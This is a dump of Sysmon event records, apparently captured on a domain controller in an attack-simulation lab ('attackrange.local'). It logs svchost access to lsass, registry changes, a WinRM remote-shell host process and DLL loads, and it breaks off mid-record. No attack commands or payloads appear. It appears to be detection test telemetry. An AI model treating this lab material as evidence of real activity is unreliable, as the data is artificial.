13:34:38.688{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000001) 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000000) 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.693{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E64-6005-AB65-050000000000}0x565ab0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.642{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7900-00000000A301}2232C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7900-00000000A301}2232C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7900-00000000A301}2232C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.626{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.626{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000002) 13241300x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.626{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\1SWD\IP_TUNNEL_VBUS\Teredo_Tunnel_Device 734700x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.610{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.610{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 